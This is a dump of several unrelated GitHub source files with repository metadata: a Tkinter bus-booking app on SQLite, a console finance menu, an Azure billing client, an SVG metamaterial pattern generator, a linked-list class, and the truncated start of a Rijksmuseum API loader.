maxWidth)\nprint(ans)\n","repo_name":"anirudhsingla8/daily_coding_problem","sub_path":"daily_coding_problem_28.py","file_name":"daily_coding_problem_28.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72497461289","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\nimport sqlite3\r\n\r\nconn = sqlite3.Connection(\"Database.db\")\r\n\r\nc = conn.cursor()\r\n\r\nc.execute(\r\n \"CREATE Table IF NOT EXISTS BUS(OPERATOR text,BUS_TYPE text,D_FROM text,A_TO text,DATE text,DEP_TIME text,ARR_TIME text,FARE integer,SEATS integer)\")\r\nconn.commit()\r\n\r\n\r\nsplash_root = Tk()\r\nsplash_root.geometry(\"1000x1000\")\r\nsplash_label = Label(splash_root, text=\"Python and DBS Project\", font=\"Times 50 bold\", relief=\"raised\")\r\nsplash_label.pack()\r\nimg1 = PhotoImage(file=\"Python.png\")\r\nsplash_image = Label(splash_root, image=img1).pack()\r\nsplash_label = Label(splash_root, text=\"Samarth Dubey\", font=\"Times 30 bold\")\r\nsplash_label.pack()\r\nsplash_label = Label(splash_root, text=\"191B304\", font=\"Times 30 bold\")\r\nsplash_label.pack()\r\nsplash_label = Label(splash_root, text=\"B9\", font=\"Times 30 bold\")\r\nsplash_label.pack()\r\ndef splashDestroy():\r\n\tsplash_root.destroy()\r\nsplash_root.after(2000,splashDestroy)\r\nsplash_root.mainloop()\r\n\r\nroot = Tk()\r\nroot.geometry(\"1000x1000\")\r\nroot_label = Label(root, text=\"BUS BOOKING SERVICE\", fg=\"blue\",font=\"Times 50 bold\", 
relief=\"raised\")\r\nroot_label.grid(columnspan=3,padx=100,pady=30)\r\nimg = PhotoImage(file=\"Bus.png\")\r\nroot_image = Label(root, image=img).grid(columnspan=3,padx=100,pady=100)\r\n\r\ndef add_bus():\r\n add_root = Tk()\r\n global img2\r\n add_root.geometry(\"1000x1000\")\r\n # img2 = PhotoImage(file=\"bus.png\")\r\n # Label(add_root, image=img2).grid()\r\n add_root_label = Label(add_root, text=\"BUS BOOKING SERVICE\", fg=\"blue\",font=\"Times 50 bold\", relief=\"raised\")\r\n add_root_label.grid(padx=100,pady=30,columnspan=2)\r\n \r\n def detail():\r\n l1=Label(add_root,text=\"Operator ID\").grid()\r\n e1=Entry(add_root)\r\n e1.grid(row=9,column=1)\r\n V=StringVar(add_root)\r\n V.set(\"All Types\")\r\n choice=['A/C','Non-A/C','A/C Sleeper','Non-A/C Sleeper','All Types']\r\n l2=Label(add_root, text=\"Bus Type\").grid()\r\n e2=OptionMenu(add_root, V, *choice)\r\n e2.grid(row=10,column=1)\r\n l3=Label(add_root,text=\"From Where\").grid()\r\n e3=Entry(add_root)\r\n e3.grid(row=11,column=1)\r\n l4=Label(add_root,text=\"To Where\").grid()\r\n e4=Entry(add_root)\r\n e4.grid(row=12,column=1)\r\n l5=Label(add_root,text=\"Date\").grid()\r\n e5=Entry(add_root)\r\n e5.grid(row=13,column=1)\r\n l6=Label(add_root,text=\"Arrival Time\").grid()\r\n e6=Entry(add_root)\r\n e6.grid(row=14,column=1)\r\n l6=Label(add_root,text=\"Departure Time\").grid()\r\n e7=Entry(add_root)\r\n e7.grid(row=15,column=1)\r\n l7=Label(add_root,text=\"Fare\").grid()\r\n e8=Entry(add_root)\r\n e8.grid(row=16,column=1)\r\n l7=Label(add_root,text=\"Seats\").grid()\r\n e9=Entry(add_root)\r\n e9.grid(row=17,column=1)\r\n def Save():\r\n conn = sqlite3.connect('Database.db')\r\n c = conn.cursor()\r\n values =(e1.get(),V.get(),e3.get(),e4.get(),e5.get(),e6.get(),e7.get(),e8.get(),e9.get())\r\n c.execute(\"\"\"INSERT INTO BUS(OPERATOR,BUS_TYPE,D_FROM,A_TO ,DATE,DEP_TIME ,ARR_TIME ,FARE ,SEATS)\r\n VALUES(?,?,?,?,?,?,?,?,?)\"\"\", values)\r\n values =(e1.get(),V.get(),e3.get(),e4.get(),e5.get(),e6.get(),e7.get(),e8.get(),e9.get())\r\n conn.commit()\r\n row = c.fetchall()\r\n print(row)\r\n conn.close()\r\n add_root.destroy()\r\n messagebox.showinfo(\"DATA\", \"DATA SAVED\")\r\n\r\n b2=Button(add_root,text=\"Save\",command=Save).grid(row=18,column=1)\r\n \r\n\r\n Heading=Label(add_root,text=\"Bus Operator Detail Filling\" ,font='Times 30 bold').grid(padx=100,pady=10,columnspan=2)\r\n l1=Label(add_root,text=\"Full Name\").grid(row=5)\r\n e1=Entry(add_root)\r\n e1.grid(row=5,column=1)\r\n l2=Label(add_root,text=\"Contact Number\").grid()\r\n e2=Entry(add_root)\r\n e2.grid(row=6,column=1)\r\n l3=Label(add_root,text=\"Address\").grid()\r\n e3=Entry(add_root)\r\n e3.grid(row=7,column=1)\r\n def check():\r\n if(e1.get()==\"\" or e2.get()==\"\" or e3.get==\"\"):\r\n add_root.destroy()\r\n messagebox.showinfo(\"error\",\"Insert values\")\r\n else:\r\n detail()\r\n b1=Button(add_root,text=\"Add Details\",command=check).grid(row=8,column=1)\r\n \r\n \r\n add_root.mainloop()\r\n\r\ndef search_bus():\r\n search_root = Tk()\r\n search_root.geometry(\"1000x1000\")\r\n search_root_label = Label(search_root, text=\"BUS BOOKING SERVICE\", fg=\"blue\",font=\"Times 50 bold\", relief=\"raised\")\r\n search_root_label.grid(padx=100,pady=30,columnspan=2)\r\n Heading=Label(search_root,text=\"Bus Details\" ,font='Times 30 bold').grid(padx=100,pady=10,columnspan=2)\r\n\r\n V=StringVar(search_root)\r\n V.set(\"All Types\")\r\n choice=['A/C','Non-A/C','A/C Sleeper','Non-A/C Sleeper','All Types']\r\n\r\n l1=Label(search_root, text=\"Type of 
Bus\").grid(row=5,column=0)\r\n OptionMenu(search_root, V, *choice).grid(row=5,column=1)\r\n l2 = Label(search_root, text=\"From Where\").grid(row=6,column=0)\r\n e1 = Entry(search_root)\r\n e1.grid(row=6,column=1)\r\n l3 = Label(search_root, text=\"Where to\").grid(row=7,column=0)\r\n e2= Entry(search_root)\r\n e2.grid(row=7,column=1)\r\n l4= Label(search_root, text=\"Date\").grid(row=8,column=0)\r\n e3= Entry(search_root)\r\n e3.grid(row=8,column=1)\r\n def bookingScreen():\r\n bookingScreen_root = Tk()\r\n bookingScreen_root.geometry(\"1000x1000\")\r\n H1 = Label(bookingScreen_root, text=\"BUS BOOKING SERVICE\", fg=\"blue\",font=\"Times 50 bold\", relief=\"raised\")\r\n H1.grid(padx=100,pady=30,columnspan=11)\r\n H2=Label(bookingScreen_root,text=\"Booking Screen\" ,font='Times 30 bold').grid(padx=100,pady=10,columnspan=11)\r\n aa=e1.get()\r\n bb=e2.get()\r\n cc=V.get()\r\n conn = sqlite3.connect('Database.db')\r\n c = conn.cursor()\r\n c.execute(\"SELECT * FROM BUS WHERE D_FROM= ? AND A_TO = ? AND BUS_TYPE = ?\",(aa,bb,cc))\r\n conn.commit()\r\n ro=c.fetchall()\r\n l=int(0)\r\n w=int(3)\r\n for i in ro:\r\n l=int(0)\r\n for j in i:\r\n qwerty=Label(bookingScreen_root,text=j , bg=\"yellow\")\r\n qwerty.grid(column=l,row=w,padx=4) \r\n l=l+1\r\n w=w+1\r\n \r\n print(ro)\r\n conn.close()\r\n l1=Label(bookingScreen_root, text=\"Operator\").grid(row=2,column=0)\r\n l2=Label(bookingScreen_root, text=\"Type\").grid(row=2,column=1)\r\n l3=Label(bookingScreen_root, text=\"From\").grid(row=2,column=2)\r\n l4=Label(bookingScreen_root, text=\"To\").grid(row=2,column=3)\r\n l5=Label(bookingScreen_root, text=\"Date\").grid(row=2,column=4)\r\n l6=Label(bookingScreen_root, text=\"Dept Time\").grid(row=2,column=5)\r\n l7=Label(bookingScreen_root, text=\"Arr Time\").grid(row=2,column=6)\r\n l8=Label(bookingScreen_root, text=\"Fare\").grid(row=2,column=7)\r\n l9=Label(bookingScreen_root, text=\"Seats Availability\").grid(row=2,column=8)\r\n \r\n \r\n def quit_booking():\r\n bookingScreen_root.destroy()\r\n \r\n HomeButton = Button(bookingScreen_root, text=\"Home\", command=quit_booking).grid(columnspan=11,padx=100,pady=100)\r\n bookingScreen_root.mainloop()\r\n\r\n def check():\r\n if(e1.get()==\"\" or e2.get()==\"\" or e3.get==\"\"):\r\n search_root.destroy()\r\n messagebox.showinfo(\"error\",\"Insert values\")\r\n else:\r\n bookingScreen()\r\n\r\n Button1 = Button(search_root, text=\"Find Buses\", command=check).grid(column=1)\r\n def quit_search():\r\n search_root.destroy()\r\n HomeButton = Button(search_root, text=\"Home\",fg=\"red\", command=quit_search,padx=10,pady=10).grid(columnspan=2,padx=20,pady=20)\r\n \r\n search_root.mainloop()\r\n\r\nadd_button = Button(root, text=\"Add Bus\", width=15, height=5, command=add_bus).grid(column=0,row=3)\r\nsearch_button = Button(root, text=\"Search Bus\", width=15, height=5, command=search_bus).grid(column=2,row=3)\r\n\r\nroot.mainloop()","repo_name":"devYRPauli/Bus-Booking-Application","sub_path":"busbooking.py","file_name":"busbooking.py","file_ext":"py","file_size_in_byte":8061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8524100220","text":"# print(\"Консольная игра 'Угадай число'\")\n# import random\n# min = int(input(\"Введите начальный диапазон: \"))\n# max = int(input (\"Введите конечный диапазон: \"))\n\n# random_number = random.randint(min, max)\n# attempts = 0\n# print (\"Мы сгенерировали случайное число в указанном вами диапазоне! 
Попробуйте его угадать!\")\n\n\n# while True:\n# response = int(input(\"Введите число: \"))\n# attempts += 1\n# if response < random_number:\n# print (\"Случайное число больше, попробуйте снова\")\n# elif response > random_number:\n# print (\"Случайное число меньше, попробуйте снова\")\n# else: \n# print (f'Ура! Вы угдали загаданное число за {attempts} попыток.')\n# break\n\n\n# print (\"Конвертер валют\")\n# choose = {\n# \"KGS\": 1,\n# \"USD\": 2,\n# \"RUB\": 3,\n# \"JPY\": 4\n# }\n# for key, value in choose.items():\n# print(value, key)\n# convert_from = int(input(\"Выберите номер валюты из выше перечисленных С котрой нужно перевести: \"))\n# convert_to = int(input(\"Выберите валюту НА которую нужно перевести: \"))\n# amount = float(input(\"Введите сумму: \"))\n\n# exchange = {\n# \"KGS\": 1,\n# \"USD\": 88.25,\n# \"RUB\": 0.92, \n# \"JPY\": 0.61\n# }\n\n# def converter(convert_to, amount):\n# try:\n# if convert_to not in choose.values():\n# raise \"Неверный номер валюты\"\n# if convert_to == 1:\n# print(f'{amount}KGS = {amount/exchange[\"KGS\"]} KGS') \n# elif convert_to == 2:\n# print(f'{amount}KGS = {amount/exchange[\"USD\"]:.2f} USD') \n# elif convert_to == 3:\n# print(f'{amount}KGS = {amount/exchange[\"RUB\"]:.2f} RUB') \n# elif convert_to == 4:\n# print(f'{amount}KGS = {amount/exchange[\"JPY\"]:.2f} JPY') \n# except Exception:\n# print (\"Убедитесь, что выбрали номер валюты из вышеперечисленного\")\n \n# converter(convert_to, amount)\n\n\n\n\nfrom income import add_income, delete_income\nfrom expense import add_expense, delete_expense\nfrom show import display_statistics, view_transitions\nwhile True:\n choose_functions = {\n 1: \"Добавление дохода\",\n 2: \"Добавление расхода\",\n 3: \"Удаление транзакции: Доход \",\n 4: \"Удаление транзакции: Расход \",\n 5: \"Просмотр списка транзакций\",\n 6: \"Анализ и отображение статистики\"\n }\n for key, value in choose_functions.items():\n print(key, value)\n \n action = int(input(\"Выберите действие: \")) \n \n if action == 1:\n add_income()\n elif action == 2:\n add_expense()\n elif action == 3:\n delete_income()\n elif action == 4:\n delete_expense()\n elif action == 5:\n view_transitions()\n elif action == 6:\n display_statistics()\n else:\n print(\"Убедитесь, что выбрали число из вышеуказанных\")\n","repo_name":"Pipinvel/python","sub_path":"first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37735391261","text":"from datetime import datetime\r\n\r\nimport requests\r\nfrom pandas import DataFrame\r\n\r\n\r\nclass AzureEA:\r\n def __init__(self, enrollment_number, access_key):\r\n self.base_url = (\r\n f\"https://consumption.azure.com/v3/enrollments/{enrollment_number}\"\r\n )\r\n self.header = {\"Authorization\": f\"Bearer {access_key}\"}\r\n\r\n def get_total_usage(self):\r\n\r\n uri = f\"{self.base_url}/balancesummary\"\r\n response = requests.get(url=uri, headers=self.header).json()\r\n return response[0][\"totalUsage\"]\r\n\r\n def get_period_usage(self, period=None):\r\n\r\n if not period:\r\n period = datetime.now().strftime(\"%Y%m\")\r\n uri = f\"{self.base_url}/billingPeriods/{period}/usagedetails\"\r\n response = requests.get(url=uri, headers=self.header).json()\r\n df = DataFrame(response[\"data\"])\r\n\r\n while response[\"nextLink\"] is not None:\r\n response = requests.get(\r\n url=response[\"nextLink\"], headers=self.header\r\n ).json()\r\n df = df.append(response[\"data\"], 
ignore_index=True)\r\n\r\n df = df.reindex(\r\n [\"serviceName\", \"subscriptionName\", \"meterName\", \"cost\"], axis=1\r\n )\r\n\r\n groups = df.groupby([\"serviceName\", \"subscriptionName\", \"meterName\"]).sum()\r\n\r\n return groups\r\n","repo_name":"positivenoise/azure-billing-prometheus-exporter","sub_path":"app/azure_ea.py","file_name":"azure_ea.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40925357413","text":"from cmath import sqrt\nfrom svgpathtools import Path, Line, Arc, bbox2path, parse_path, wsvg\nfrom datetime import date\n\n\nclass Generator:\n \"\"\"\n CREATE a metamaterial SVG\n \"\"\"\n\n def __init__(self, output=\"output\"):\n \"\"\"Stores parameters for the zigzag height and width and sets up the dictionary of shapes\"\"\"\n # an array of all the shapes that have been created\n self.shapes = {}\n # an array of shapes that have been filled. These should be\n # automatically updated when something is changed in self.shapes\n self.filled_shapes = {}\n\n # zigzag fill only\n # the width of the short zigzag\n self.short_zigzag_width = 12\n # the height of both zigzags is the same\n self.zigzag_height = 18\n # the width of the long zigzag\n self.long_zigzag_width = 24\n\n # lozenge grid infill only\n self.loz_long_side = 42.5/5\n self.loz_short_side = 29/5 \n self.loz_gap = 13.5/5 \n self.loz_spacing = self.loz_long_side + self.loz_short_side + self.loz_gap\n\n # the default output directory\n self.output_dir = output\n\n # the default name for a shape\n self.default_shape_name = 'rect'\n # the default fill style\n self.default_fill_name = 'zigzag'\n\n self.print_list = [\"fill_shape_lozenge\"]\n\n def fill_shape(self, shape_name=\"default\", rotation=0, border=True, filltype=\"default\", position=[0,0]):\n \"\"\" Files a shape with the type described in filltype\"\"\"\n\n name = self.default_shape_name if (\n shape_name == \"default\") else shape_name\n my_fill = self.default_fill_name if (\n filltype == \"default\") else filltype\n\n # find bounding box of shape to be filled\n shape_path = self.shapes[name]\n bbx = shape_path.bbox()\n # find longest side of bounding box\n xlength = bbx[1] - bbx[0]\n ylength = int(bbx[3] - bbx[2])\n diagonal = sqrt(xlength * xlength + ylength * ylength).real + 0.2\n self.print(\"fill_shape\", diagonal)\n\n # diagonal/2 is the center of the rectangle;\n # bbx[0]+xlength/2 is the center of the shape\n # subtract to figure out how much to translate\n x_translate = (bbx[0] + xlength / 2) - diagonal / 2\n y_translate = 1j * ((bbx[2] + ylength / 2) - diagonal / 2)\n\n if (my_fill == 'zigzag'):\n # fill a rectangle that is as large as the bounding box\n rect = self.make_zigzag_rectangle(diagonal, diagonal)\n else:\n # fill a rectangle that is as large as the bounding box\n rect = self.make_loz_rectangle(diagonal, diagonal)\n\n rotated_rect = []\n for path in rect:\n if (rotation > 0):\n path = path.rotated(\n rotation, diagonal / 2 + 1j * diagonal / 2)\n # calculate the amount to translate in x as the upper left corner\n # of this path minus the upper left corner of the shape's bounding box\n path = path.translated(x_translate + y_translate)\n rotated_rect.append(path)\n\n self.print(\"fill_shape\",\"cropping \")\n # call crop to shape\n cropped_shape = self.crop_to_shape(shape_path, rotated_rect)\n \n self.print(\"fill_shape\",\"adding border\")\n # add border if needed\n if border:\n cropped_shape.append(shape_path)\n\n 
self.print(\"fill_shape\", \"translating shape\")\n\n translated_shape = []\n for path in cropped_shape:\n path = path.translated(position[0]+position[1]*1j)\n translated_shape.append(path)\n \n # save in filled_shapes\n self.filled_shapes[name] = translated_shape\n\n################### ZIGZAG HELPER CODE #####################\n def make_zigzag_column(self, zigzag_width, zigzag_height, total_length, start_x, start_y):\n \"\"\"generates a column of zigzags(with given width and height) at a specific coordinate(start_x, start_y) of a certain length(total_length)\"\"\"\n path = Path()\n x = start_x\n y = start_y\n x_end = start_x + zigzag_width\n num_repeats = int(total_length/zigzag_height + 1)\n for i in range(num_repeats):\n path.append(Line(x + y*1j, x_end+(y+zigzag_height/2)*1j))\n path.append(Line(x_end + (y+zigzag_height/2)\n * 1j, x + (y+zigzag_height)*1j))\n y = y+zigzag_height\n return path\n\n def make_zigzag_rectangle(self, rectangle_width, rectangle_height):\n \"\"\"makes a rectangle out of small and large zigzag columns at 0, 0 that is the given size. basically generates the base auxetic material pattern\"\"\"\n\n num_repeats = int(\n rectangle_width/(self.long_zigzag_width - self.short_zigzag_width) + 1)\n rectangle_of_zigzags = []\n start_x = 0\n y = 0\n for i in range(num_repeats):\n rectangle_of_zigzags.append(self.make_zigzag_column(\n self.short_zigzag_width, self.zigzag_height, rectangle_height, start_x, y))\n start_x = start_x\n rectangle_of_zigzags.append(self.make_zigzag_column(\n self.long_zigzag_width, self.zigzag_height, rectangle_height, start_x, y))\n start_x = start_x+self.long_zigzag_width-self.short_zigzag_width\n return rectangle_of_zigzags\n\n ################### LOZENGE HELPER CODE #####################\n \n def make_loz_line(self, total_length, start_x, start_y, direction=\"row\", flip=False):\n \"\"\" Makes one of four possible lines: a row, a flipped row, a column, or a flipped column. \n direction spefies row or column. 
\"\"\"\n path = Path()\n\n # Calculates number of repeats within a line\n num_repeats = int(total_length/(2*self.loz_long_side)+1) \n self.print(\"make_loz_line\",f\"creating {direction} at ({start_x}, {start_y}) that is {flip} with {num_repeats} repeated per line of length {total_length}\")\n \n # unflipped row start\n unflipped_row_start = [start_x, start_y] # start at start_x, start_y\n # flipped row start\n flipped_row_start = [start_x, start_y+self.loz_short_side]\n # unflipped col start\n unflipped_col_start = [start_x-1.5, start_y+7] # where did these numbers come from\n # flipped col start\n flipped_col_start = [start_x-1.5, start_y+7] # where did these numbers come from\n\n # when to apply changes to x, and when to apply them to y\n row_order = [[1,0],[0,1],[1,0],[0,1],[1,0]]\n col_order = [[0,1],[1,0],[0,1],[1,0],[0,1]]\n \n increase_first = [self.loz_long_side/2,\n self.loz_short_side, # increase \n self.loz_long_side,\n -self.loz_short_side, # decrease\n self.loz_long_side/2]\n decrease_first = [self.loz_long_side/2,\n -self.loz_short_side, # decrease\n self.loz_long_side,\n self.loz_short_side, # increase\n self.loz_long_side/2]\n\n if (direction == \"row\"): \n cursor = flipped_row_start if flip else unflipped_row_start\n changes = decrease_first if flip else increase_first\n order = row_order\n else:\n cursor = flipped_col_start if flip else unflipped_col_start\n changes = increase_first if flip else decrease_first\n order = col_order\n \n # turn that information into a list of x and y changes\n # in the format [[x1, y1],[x2, y2],[x3, y3]...]\n change_list = list(map(lambda change, item: \n list(map(lambda val: change*val, item)),\n changes,\n order))\n \n self.print(\"make_loz_line\",change_list)\n\n # repeatedly execute the changes until num_repeats\n for i in range(num_repeats):\n for change in change_list:\n self.print(\"make_loz_line\", cursor)\n path.append(Line(cursor[0]+cursor[1]*1j,\n (cursor[0]+change[0])+(cursor[1]+change[1])*1j))\n cursor[0] = cursor[0]+change[0]\n cursor[1] = cursor[1]+change[1]\n return path\n \n def make_loz_rectangle(self, rectangle_width, rectangle_height):\n \"\"\" Makes a rectangle of width, height and fills it with a lozenge grid. loz_orizontal_len is the length of a single lozenge on the horizental lines. loz_short_side. 
loz_spacing is the distance between things that are the same \"\"\"\n\n # Calculate number of repeats across the whole rectangle\n num_repeats_y = int(2+rectangle_width/self.loz_spacing)\n num_repeats_x = int(2+rectangle_height/self.loz_spacing)\n\n self.print(\"make_loz_rectangle\",f\"making rectangle with width {rectangle_width}, height {rectangle_height} with {num_repeats_y} horizontal and {num_repeats_x} vertical lines \")\n \n \n return_rect = []\n start_x = 0 # increments by\n start_y = 0\n start_y_flipped = 0 + self.loz_short_side + self.loz_gap\n start_x_column = 0\n start_y_column = 0\n start_x_column_flipped = 0 + self.loz_gap\n\n for i in range(num_repeats_y):\n self.print(\"make_loz_rectangle\",f\"{i} rows\")\n return_rect.append(self.make_loz_line(rectangle_width, start_x, start_y))\n return_rect.append(self.make_loz_line(rectangle_width, start_x, start_y_flipped, flip=True))\n start_y = start_y + self.loz_spacing\n start_y_flipped = start_y_flipped + self.loz_spacing\n for i in range(num_repeats_x):\n self.print(\"make_loz_rectangle\",f\"{i} columns\")\n return_rect.append(self.make_loz_line(rectangle_height, start_x_column, start_y_column,\n direction=\"column\"))\n return_rect.append(self.make_loz_line(rectangle_height, start_x_column_flipped, start_y_column,\n direction=\"column\", flip=True))\n start_x_column = start_x_column + self.loz_spacing\n start_x_column_flipped = start_x_column_flipped + self.loz_spacing\n start_x = start_x+self.loz_spacing\n\n return return_rect\n\n ############################# OTHER HELPERS #############################\n\n def crop_to_shape(self, shape_path, rectangle_paths):\n \"\"\"crops a given shape(path outline) to a filled rectangle.\"\"\"\n cropped_paths = []\n\n xmin, xmax, ymin, ymax = shape_path.bbox()\n pt_outside_shape = (xmin-1) + (ymin-1)*1j\n shape_path = shape_path.translated(-0.1 - 0.1j)\n for path in rectangle_paths:\n pt = 0\n for (T1, seg1, t1), T2 in path.intersect(shape_path):\n if T1 < pt:\n cropped_paths.append(\n Line(path.point(pt), path.point(T1)))\n elif T1 == pt:\n continue\n else:\n cropped_paths.append(path.cropped(pt, T1))\n pt = T1\n final_version = []\n for path in cropped_paths:\n pt = path.point(0.5)\n crosses = Path(Line(pt, pt_outside_shape)).intersect(shape_path)\n if len(crosses) % 2:\n final_version.append(path)\n\n return final_version\n\n def offset_curve(self, path, offset_distance, steps=1000):\n \"\"\"Takes in a Path object, `path`, and a distance,\n `offset_distance`, and outputs an piecewise-linear approximation\n of the 'parallel' offset curve.\"\"\"\n offpath = f\"M \"\n nls = []\n for seg in path:\n ct = 1\n for k in range(steps):\n t = k / steps\n offset_vector = offset_distance * seg.normal(t)\n offpath += f\" {seg.point(t).real}, {seg.point(t).imag}\"\n nl = Line(seg.point(t), seg.point(t) + offset_vector)\n nls.append(nl)\n connect_the_dots = [Line(nls[k].end, nls[k+1].end)\n for k in range(len(nls)-1)]\n if path.isclosed():\n connect_the_dots.append(Line(nls[-1].end, nls[0].end))\n offpath += \" Z\"\n # offset_path = Path(*connect_the_dots)\n offset_path = parse_path(offpath)\n return offset_path\n\n def fill_offset_curve(self, shape, offset_distance, steps=1000):\n \"\"\"Takes in a Path object, `path`, and a distance,\n `offset_distance`, and outputs an piecewise-linear approximation\n of the 'parallel' offset curve.\"\"\"\n path = self.shapes[shape]\n\n offset_path = self.offset_curve(path, offset_distance, steps)\n path.append(offset_path)\n # path = Path(*offset_path, *path)\n # path 
= Path(path.d())\n self.shapes[shape] = path\n\n return path\n # return offset_path\n\n def print(self, name, text):\n result = print(f\"{name}: {text}\") if name in self.print_list else False\n result = print(f\"{text}: {self.shapes[name]}\") if name in self.shapes else False\n\n def make_svg(self, names, filled_names, filename, units='mm', svg_attributes=None, attributes=None):\n \"\"\"Saves a list of shapes as an svg\"\"\"\n paths = []\n for name in names:\n path = self.shapes[name]\n # self.print(path.bbox(), name)\n paths += path\n\n for name in filled_names:\n path = self.filled_shapes[name]\n # self.print(path.bbox(), name)\n paths += path\n\n filename=f\"{self.output_dir}/{filename}_zig{self.short_zigzag_width}.{self.zigzag_height}.{self.long_zigzag_width}_loz{self.loz_long_side}.{self.loz_short_side}.{self.loz_gap}_{date.today().isoformat()}.svg\"\n \n # if (len(attributes) is 0): attributes = np.full(len(names)+1, {})\n wsvg(paths=paths, filename=filename,\n baseunit=units, svg_attributes=svg_attributes, attributes=attributes)\n\n################### Setters and Getters ####################\n\n def set_default_shape_name(self, name):\n self.default_shape_name = name\n\n def set_default_fill_name(self, name):\n self.default_fill_name = name\n\n def set_print_list(self, list):\n self.print_list = list\n\n################### Shape making functions (standard graphics stuff) ####################\n\n def add_path(self, name, path):\n \"\"\" Adds a path to the dictionary. Path should be specified using a d string and is then parsed. \"\"\"\n path = parse_path(path)\n self.shapes[name] = path\n\n def add_shape(self, name, shape):\n \"\"\" Adds a shape to the dictionary, specified as a d string\"\"\"\n self.shapes[name] = shape\n\n def add_rect(self, name, w, h):\n \"\"\" Adds a rectangle to the dictionary\"\"\"\n self.add_path(name, f\"M 0 0 h {w} v {h} h {-w} Z\")\n\n def add_line(self, name, start, end):\n \"\"\" Adds a line to the dictionary \"\"\"\n self.shapes[name] = Line(start, end)\n\n def add_line(self, name, x1, y1, x2, y2):\n \"\"\" Adds a line to the dictionary \"\"\"\n self.shapes[name] = Line(x1+1j*y1, x2+1j*y2)\n\n def add_circle(self, name, radius):\n \"\"\" Adds a circle to the dictionary\"\"\"\n circle = Path(Arc(start=0 + 120j, rotation=0, radius=radius, large_arc=1, sweep=180, end=200 + 120j),\n Arc(start=200 + 120j, rotation=180, radius=radius, large_arc=1, sweep=180, end=0 + 120j))\n # need to tie the start and end to the radius\n self.shapes[name] = circle\n return circle\n\n def scale_shape(self, name, fraction):\n \"\"\"Scales an existing shape (or every path in a shape) to a fraction of its current size\"\"\"\n # add ability to scale differently in X and Y and to choose scale origin\n shape = self.shapes[name]\n self.shapes[name] = shape.scaled(fraction)\n\n def translate_shape(self, name, translate):\n \"\"\" Translate a shapy (or every path in a shape) by the complex coordinates given\"\"\"\n shape = self.shapes[name]\n self.shapes[name] = shape.translated(translate)\n\n def move_to_origin(self, name, topleft=True, middle=False):\n \"\"\"Moves the shape to the orgin. 
If topleft, move the top left of the bounding box\n to the origin, otherwise move the middle to the orgiin.\"\"\"\n bbx = self.shapes[name].bbox()\n translate = -bbx[1]-1j*bbx[2]\n\n if middle:\n xlength = bbx[1]-bbx[0]\n ylength = int(bbx[3]-bbx[2])\n translate = translate - xlength/2-1j*ylength/2\n\n self.translate_shape(name, middle)\n\n def move_new_location(self, name, xnew, ynew, middle=True):\n bbx = self.shapes[name].bbox()\n\n translate = -bbx[1]-1j*bbx[2]\n\n if middle:\n translate = translate - xnew - 1j*ynew\n\n self.translate_shape(name, middle)\n","repo_name":"make4all/meta-embroidery","sub_path":"metamaterial_generator/metamaterial_generator.py","file_name":"metamaterial_generator.py","file_ext":"py","file_size_in_byte":17091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4232622172","text":"class Node():\n def __init__(self,data = None):\n self.data = data\n self.next = None\n\nclass SingleLinkedList():\n def __init__(self):\n self.head = None\n\n def traverseList(self):\n print_val = self.head\n\n while print_val is not None:\n print(print_val.data)\n print_val = print_val.next\n\n #Update the new nodes next val to existing node\n def insert_val_At_begining (self,new_data):\n new_Node = Node(new_data)\n new_Node.next = self.head\n self.head = new_Node\n\n def insert_val_At_End(self,new_data):\n new_Node = Node(new_data)\n #If linkedList is empty,insert node at head level\n if self.head is None:\n self.head = new_Node\n return\n #decalring variable for last node in linkedlist\n laste = self.head\n while laste.next:\n laste =laste.next\n laste.next = new_Node\n\n #Inserting in between two data Nodes\n\n def in_between(self,middle_node,new_data):\n if middle_node is None:\n print(\"The mentioned node is absent\")\n return\n new_Node = Node(new_data)\n new_Node.next = middle_node.next\n middle_node.next = new_Node\n\n def remove_Node(self,remove_key):\n head_val = self.head\n\n if head_val is not None:\n if head_val.data == remove_key:\n self.head = head_val.next\n head_val = None\n return\n while head_val is not None:\n if head_val.data == remove_key:\n break\n prev = head_val\n head_val = head_val.next\n\n if head_val == None:\n return\n prev.next = head_val.next\n\n head_val = None\n\n\n\n\n\ns = SingleLinkedList()\ns.insert_val_At_begining(\"At Begining\")\ns.traverseList()\n","repo_name":"boddugopikrishna/LearningOne","sub_path":"venv/All functions/Data Structures/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9972600660","text":"import requests\nfrom model import Item, Repository, Artist, ItemLanguage, Department\nimport os\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nengine = create_engine(os.environ['DATABASE_URL'])\nSession = sessionmaker(bind=engine)\nsession = Session()\n\napikey = os.environ[\"RIJKS_KEY\"]\n\n\ndef search():\n for x in range(1, 10):\n res = requests.get(\"https://www.rijksmuseum.nl/api/en/collection?key={}&format=json&p={}&ps=100&imgonly=True&st=Objects\".format(apikey, x)).json()\n for obj in res['artObjects']:\n obj_id = obj['objectNumber']\n item = session.query(Item).filter_by(api_id=obj_id).first()\n if not item:\n loader(obj_id)\n\n\ndef loader(obj_id):\n base_url = \"https://www.rijksmuseum.nl/api/{}/collection/{}?key={}&format=json\".format(\"en\", obj_id, apikey)\n response = 
